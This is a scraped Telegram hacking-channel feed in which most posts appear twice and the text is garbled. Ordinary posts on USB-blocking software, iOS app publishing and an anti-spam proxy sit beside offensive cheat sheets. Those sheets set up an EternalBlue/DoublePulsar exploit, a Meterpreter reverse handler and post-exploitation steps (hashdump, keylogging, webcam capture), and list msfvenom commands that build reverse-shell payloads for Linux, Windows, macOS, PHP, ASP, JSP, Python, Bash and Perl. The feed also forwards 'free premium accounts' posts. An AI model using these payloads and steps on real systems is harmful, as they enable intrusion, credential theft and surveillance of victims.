โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆComputer Data Leakage Prevention System
WHAT IS Computer Data Leakage Prevention System ?
(download address: http://www.grabsun.com/monitorusb.html ) is an enterprise document security management system designed to protect computer files and prevent the disclosure of business secrets. The system can not only completely disable the use of U disks and USB storage devices, but also disable network disks, emails, FTP file uploads, and chat software to send files to disclose company commercial secrets. In addition, the system also integrates a series of computer usage management functions, which can effectively regulate the employee's computer network usage during work hours, which can not only further protect computer file security and network security, but also improve employee work efficiency and achieve network management The real purpose of the.
๐ฆThe specific functions of Dashizhi Enterprise Data Anti-Leakage Software are as follows:
1. You can completely prohibit the use of U disks, mobile hard disks, SD cards, mobile phones to connect to computers, tablet computers and other devices with storage functions.
2. Completely disable the use of optical drives and floppy drives. At the same time, you can only prohibit the burning of optical drives and limit the use of burning optical drives without affecting the playback function of the optical drive.
3. Completely disable the computer COM port, prohibit the use of computer ports, prohibit the use of external devices such as printers.
4. Comprehensively protect the security of the operating system, prohibit the modification of the registry, prohibit the modification of group policies, prohibit the use of msconfig, prohibit entering the computer security mode, disable the use of the task manager, prohibit the use of the device manager, etc.
5. Comprehensively prevent employees from uninstalling, preventing accidental killing or interception by anti-virus software, protecting computer information security to the greatest extent, and protecting enterprise commercial secrets.
6. Allow network administrators to set blacklists that prohibit computers from running programs and whitelists of programs that are only allowed to run, blacklists of URLs that are not allowed to be accessed, and whitelists of URLs that are only allowed to be accessed, thereby enhancing the control of computer usage.
7. The functions of effectively prohibiting network hotspots, prohibiting 360 portable wifi, prohibiting Baidu portable wifi, shielding wifi sharing wizard, and prohibiting wifi master keys, preventing employees from using these portable wifi to provide Internet access for their laptops, mobile phones or tablets .
8. Added banned email sending, banned network disk upload, banned forum attachment upload, banned FTP upload, allowed only specific QQ number login, only allowed specific Aliwangwang account login, banned QQ sending files, banned QQ group shared file upload.
9. Exclusively supports both stand-alone installation and stand-alone management, as well as the management of the server and client based on the C/S architecture, thereby facilitating the user's use.
10. Personalized customization is available for users. All kinds of computer equipment and any configuration of the operating system are forbidden at any time to protect computer security and commercial secrets.
๐ฆSome guys here hate chineese tools, but anyway we post for learn only !
ENJOYโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆComputer Data Leakage Prevention System
WHAT IS Computer Data Leakage Prevention System ?
(download address: http://www.grabsun.com/monitorusb.html ) is an enterprise document security management system designed to protect computer files and prevent the disclosure of business secrets. The system can not only completely disable the use of U disks and USB storage devices, but also disable network disks, emails, FTP file uploads, and chat software to send files to disclose company commercial secrets. In addition, the system also integrates a series of computer usage management functions, which can effectively regulate the employee's computer network usage during work hours, which can not only further protect computer file security and network security, but also improve employee work efficiency and achieve network management The real purpose of the.
๐ฆThe specific functions of Dashizhi Enterprise Data Anti-Leakage Software are as follows:
1. You can completely prohibit the use of U disks, mobile hard disks, SD cards, mobile phones to connect to computers, tablet computers and other devices with storage functions.
2. Completely disable the use of optical drives and floppy drives. At the same time, you can only prohibit the burning of optical drives and limit the use of burning optical drives without affecting the playback function of the optical drive.
3. Completely disable the computer COM port, prohibit the use of computer ports, prohibit the use of external devices such as printers.
4. Comprehensively protect the security of the operating system, prohibit the modification of the registry, prohibit the modification of group policies, prohibit the use of msconfig, prohibit entering the computer security mode, disable the use of the task manager, prohibit the use of the device manager, etc.
5. Comprehensively prevent employees from uninstalling, preventing accidental killing or interception by anti-virus software, protecting computer information security to the greatest extent, and protecting enterprise commercial secrets.
6. Allow network administrators to set blacklists that prohibit computers from running programs and whitelists of programs that are only allowed to run, blacklists of URLs that are not allowed to be accessed, and whitelists of URLs that are only allowed to be accessed, thereby enhancing the control of computer usage.
7. The functions of effectively prohibiting network hotspots, prohibiting 360 portable wifi, prohibiting Baidu portable wifi, shielding wifi sharing wizard, and prohibiting wifi master keys, preventing employees from using these portable wifi to provide Internet access for their laptops, mobile phones or tablets .
8. Added banned email sending, banned network disk upload, banned forum attachment upload, banned FTP upload, allowed only specific QQ number login, only allowed specific Aliwangwang account login, banned QQ sending files, banned QQ group shared file upload.
9. Exclusively supports both stand-alone installation and stand-alone management, as well as the management of the server and client based on the C/S architecture, thereby facilitating the user's use.
10. Personalized customization is available for users. All kinds of computer equipment and any configuration of the operating system are forbidden at any time to protect computer security and commercial secrets.
๐ฆSome guys here hate chineese tools, but anyway we post for learn only !
ENJOYโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Grabsun
ไบงๅไป็ป-USB็ซฏๅฃ็ฆ็จ่ฝฏไปถ,็ฆ็จUSB็ซฏๅฃ่ฝฏไปถ,ๅฑ่ฝUSBๆฅๅฃ,็ฆ็จUSBๆฅๅฃ,U็็ฆ็จ่ฝฏไปถ,USB็ฆ็จ่ฝฏไปถ,U็็ฆ็จๅฐ็ฒพ็ต-ๅคงๅฟ่ณ่ฝฏไปถๅฎ็ฝ-ๆฐๆฎ้ฒๆณๅฏ็ณป็ป,ไผไธ้ฒๆณๅฏ่ฝฏไปถ,ๆฐๆฎ้ฒๆณๆผ่งฃๅณๆนๆก,ไผไธๆฐๆฎ้ฒๆณๅฏ,usb็ซฏๅฃๆงๅถ่ฝฏไปถ,ๅฑๅ็ฝๅ
ฑไบซๆไปถ็ฎก็
็ฝ็ป็ๆง่ฝฏไปถ,ๅฑๅ็ฝ้้่ฝฏไปถ,ๅฑๅ็ฝๆต้็ป่ฎก่ฝฏไปถ,็ฝ็ป่กไธบ็ฎก็็ณป็ป,ๅฑๅ็ฝๆงๅถ่ฝฏไปถๅคงๅฟ่ณUSB็ซฏๅฃ็ฎก็่ฝฏไปถๆฏๆๆๆ็U็็ฆ็จ่ฝฏไปถ๏ผๆไฝ ๅฆไฝ็ฆ็จU็๏ผๅฆไฝๅฑ่ฝU็๏ผๆๆ ท็ฆ็จUSBๆฅๅฃ,ๅฆไฝ็ฆ็จUSB็ซฏๅฃไฝฟ็จ,ๆฏๆๆๆ็USB็ฆ็จ่ฝฏไปถ,USBๆฅๅฃๅฑ่ฝ่ฝฏไปถ,USB็ๆง่ฝฏไปถ๏ผๅฎๅ
จ็ฆ็จUSBๅญๅจ่ฎพๅค่ไธๅฝฑๅUSB้ผ ๆ ้ฎ็็ไฝฟ็จใ
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from iUNDERCODE - iOs JAILBREAK & MODS
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ FREE COURSES iOs by Apple developers :
1๏ธโฃFace ID and your Apps
iOS
One of the most advanced features of iPhone X, Face ID is a secure biometric authentication technology that lets users easily unlock, authenticate, pay, and quickly access your app with just a glance. While it has many similarities to Touch ID, there are a few key differences. Learn more about...
2๏ธโฃConfiguring Your Developer Account for Apple Pay
iOS, MacOS
Apple Pay is the easy, secure, and private way to pay for physical goods and services within apps and websites. Find out how you can configure your Apple Developer Account to start using the Apple Pay APIs.
2๏ธโฃBuilding Sticker Packs
iOS
Turn your artwork into a sticker pack for Messages on iOS 10. Learn how to bundle both images and animations into your sticker pack and test your finished result.
3๏ธโฃSubmitting an iMessage App or Sticker Pack - Part 1
iOS
Learn how to distribute your sticker pack on the App Store. Simply add your app to iTunes Connect and enter the required information, including description, keywords, and screenshots.
4๏ธโฃSubmitting an iMessage App or Sticker Pack - Part 2
iOS
Find out how to submit your sticker pack to App Review, the last step before your app can be distributed on the App Store.
> WATCH OR DOWNLOAD :
https://developer.apple.com/videos/tutorials
Enjoyโค๏ธ๐๐ป
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ FREE COURSES iOs by Apple developers :
1๏ธโฃFace ID and your Apps
iOS
One of the most advanced features of iPhone X, Face ID is a secure biometric authentication technology that lets users easily unlock, authenticate, pay, and quickly access your app with just a glance. While it has many similarities to Touch ID, there are a few key differences. Learn more about...
2๏ธโฃConfiguring Your Developer Account for Apple Pay
iOS, MacOS
Apple Pay is the easy, secure, and private way to pay for physical goods and services within apps and websites. Find out how you can configure your Apple Developer Account to start using the Apple Pay APIs.
2๏ธโฃBuilding Sticker Packs
iOS
Turn your artwork into a sticker pack for Messages on iOS 10. Learn how to bundle both images and animations into your sticker pack and test your finished result.
3๏ธโฃSubmitting an iMessage App or Sticker Pack - Part 1
iOS
Learn how to distribute your sticker pack on the App Store. Simply add your app to iTunes Connect and enter the required information, including description, keywords, and screenshots.
4๏ธโฃSubmitting an iMessage App or Sticker Pack - Part 2
iOS
Find out how to submit your sticker pack to App Review, the last step before your app can be distributed on the App Store.
> WATCH OR DOWNLOAD :
https://developer.apple.com/videos/tutorials
Enjoyโค๏ธ๐๐ป
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Apple
Tutorial - Videos - Apple Developer
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe release of iOS APP is divided into two parts AB, first test the APP, if there is no problem, upload the APP to review!
Part A: The real machine debugging is introduced in 5 steps. If the real machine has been tested well, please directly drop down to see step B.
(Be sure to test the app first before putting it on the shelf, or if there are a bunch of bugs in the app, it will be reviewed but it will waste time)
1. Install Appuploader, an iOS auxiliary software
> http://www.applicationloader.net/appuploader/download.php
2. Log in to Appuploader to apply for iOS development certificate file p12
3. Log in to Appuploader to apply for iOS development certificate description file mobileprovision
4. Use the iOS certificate file to package the Apple APP
5. Install the packaged APP to the Apple mobile phone to test
Part B: App Store review is conducted in 6 steps.
1. Apply for iOS release certificate
2. Apply for iOS release description file
3. Pack ipa
4. iTunes Connect creates APP
5. Upload ipa
6. Set APP information submission for review
@iUndercode
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe release of iOS APP is divided into two parts AB, first test the APP, if there is no problem, upload the APP to review!
Part A: The real machine debugging is introduced in 5 steps. If the real machine has been tested well, please directly drop down to see step B.
(Be sure to test the app first before putting it on the shelf, or if there are a bunch of bugs in the app, it will be reviewed but it will waste time)
1. Install Appuploader, an iOS auxiliary software
> http://www.applicationloader.net/appuploader/download.php
2. Log in to Appuploader to apply for iOS development certificate file p12
3. Log in to Appuploader to apply for iOS development certificate description file mobileprovision
4. Use the iOS certificate file to package the Apple APP
5. Install the packaged APP to the Apple mobile phone to test
Part B: App Store review is conducted in 6 steps.
1. Apply for iOS release certificate
2. Apply for iOS release description file
3. Pack ipa
4. iTunes Connect creates APP
5. Upload ipa
6. Set APP information submission for review
@iUndercode
โ โ โ iU๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 TOPIC HACKING-PENTESTING
F E A T U R E S :
Multiple Weighted DNSBLs
Multiple Weighted URIBLs
Greylisting
Weighted Regular Expression Filtering
Bayesian
Penalty Box
SenderBase
SSL/TLS
SPF/SRS
Attachment Blocking
ClamAV and FileScan
Blocking Reporting
LDAP support
Backscatter Detection
recipient replacement / GUI user access rights management
MIME charset conversion / DKIM check and signing
multi DB support for all hashes / level based open plugin support
transparent TCP proxy support
Plugins: archive, full attachment check and replacement, OCR
damping (steal spammers time)
AUTH to relay host / POP3 collector
configuration value and file synchronization
Block Reports design could be customized
Razor2 and DCC support using Plugin
SNMP support (monitoring, configuring, controll-API)
user group import (file or LDAP or command based)
automatic crash analyzer Hidden Markov Model
IPv6 socket support
word stemming (several languages) for Bayesian analyzer
Perl module autoupdate via PPM or CPAN
Hidden Markov Model spam detection engine
full unicode support
DMARC support
privat Whitelist (legacy, domain based, user based)
privat IP and Domain lists (legacy, domain based, user based)
CPU affinity settings
web file commander
graphical statistic output (SVG)
native SSL support for target hosts
client SSL-certificate validation
privat SMIME signing
corporate SMIME signing, using a single privat certificate
content based executable attachment blocking
content based compressed attachment blocking
BATV check and signing
Message-ID signing and check FBMTV
remote support
Authenticated Received Chain (ARC) processing and signing
RSS feeds for blocked emails using Plugin
zero day virus detection
VirusTotal API
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Hidden-Markov-Model and/or Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Files' to download the professional version 2.6.3 build 20002.
A linux(ubuntu 18.04 LTS) and a freeBSD 11.2 based ready to run OVA of ASSP V2 are also available for download.
> DOWNLOAD :
> https://sourceforge.net/projects/assp/files/latest/download
enjoyโค๏ธ๐๐ป
โ Topic 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2020 TOPIC HACKING-PENTESTING
F E A T U R E S :
Multiple Weighted DNSBLs
Multiple Weighted URIBLs
Greylisting
Weighted Regular Expression Filtering
Bayesian
Penalty Box
SenderBase
SSL/TLS
SPF/SRS
Attachment Blocking
ClamAV and FileScan
Blocking Reporting
LDAP support
Backscatter Detection
recipient replacement / GUI user access rights management
MIME charset conversion / DKIM check and signing
multi DB support for all hashes / level based open plugin support
transparent TCP proxy support
Plugins: archive, full attachment check and replacement, OCR
damping (steal spammers time)
AUTH to relay host / POP3 collector
configuration value and file synchronization
Block Reports design could be customized
Razor2 and DCC support using Plugin
SNMP support (monitoring, configuring, controll-API)
user group import (file or LDAP or command based)
automatic crash analyzer Hidden Markov Model
IPv6 socket support
word stemming (several languages) for Bayesian analyzer
Perl module autoupdate via PPM or CPAN
Hidden Markov Model spam detection engine
full unicode support
DMARC support
privat Whitelist (legacy, domain based, user based)
privat IP and Domain lists (legacy, domain based, user based)
CPU affinity settings
web file commander
graphical statistic output (SVG)
native SSL support for target hosts
client SSL-certificate validation
privat SMIME signing
corporate SMIME signing, using a single privat certificate
content based executable attachment blocking
content based compressed attachment blocking
BATV check and signing
Message-ID signing and check FBMTV
remote support
Authenticated Received Chain (ARC) processing and signing
RSS feeds for blocked emails using Plugin
zero day virus detection
VirusTotal API
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Hidden-Markov-Model and/or Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Files' to download the professional version 2.6.3 build 20002.
A linux(ubuntu 18.04 LTS) and a freeBSD 11.2 based ready to run OVA of ASSP V2 are also available for download.
> DOWNLOAD :
> https://sourceforge.net/projects/assp/files/latest/download
enjoyโค๏ธ๐๐ป
โ Topic 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Mobile Application Test Notes (Android)
Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
Creating an emulator and installing the application
+ Create a virtual device:
- android avd
+ Start the emulator:
- emulator โavd testavd
+ Install the application:
- adb install <path of the .apk file>
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Start the emulator and proxy:
- emulator โavd testavd โhttp-proxy http://localhost:8080
+ Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
+ Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Mobile Application Test Notes (Android)
Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android
Creating an emulator and installing the application
+ Create a virtual device:
- android avd
+ Start the emulator:
- emulator โavd testavd
+ Install the application:
- adb install <path of the .apk file>
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Start the emulator and proxy:
- emulator โavd testavd โhttp-proxy http://localhost:8080
+ Download and install burp certificate (.crt) onto the emulator using the push shell command.
Notes:
+ Application file type - x.apk
Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp
http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Android Developers Blog
Changes to Trusted Certificate Authorities in Android Nougat
News and insights on the Android platform, developer tools, and events.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMobile Application Test Notes (iPhone)
Prepping Device and Application:
+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working
Prepping Burp Suite:
+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners โ enter โportโ as 8080, disable โloopback onlyโ and select โsupport invisibleโ.
+ Download and install burp certificate (.crt) onto ipad.
Mobile Application Penetration Testing:
+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/
Notes:
+ Application file type - x.ipa
+ Easy way:
- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM databaseโ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆFOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see โmsfvenom โhelp-formatsโ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler โ โmsfconsole -L -r โ
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆFOR BEGINERS :
+ Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
Shellcode
For all shellcode see โmsfvenom โhelp-formatsโ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
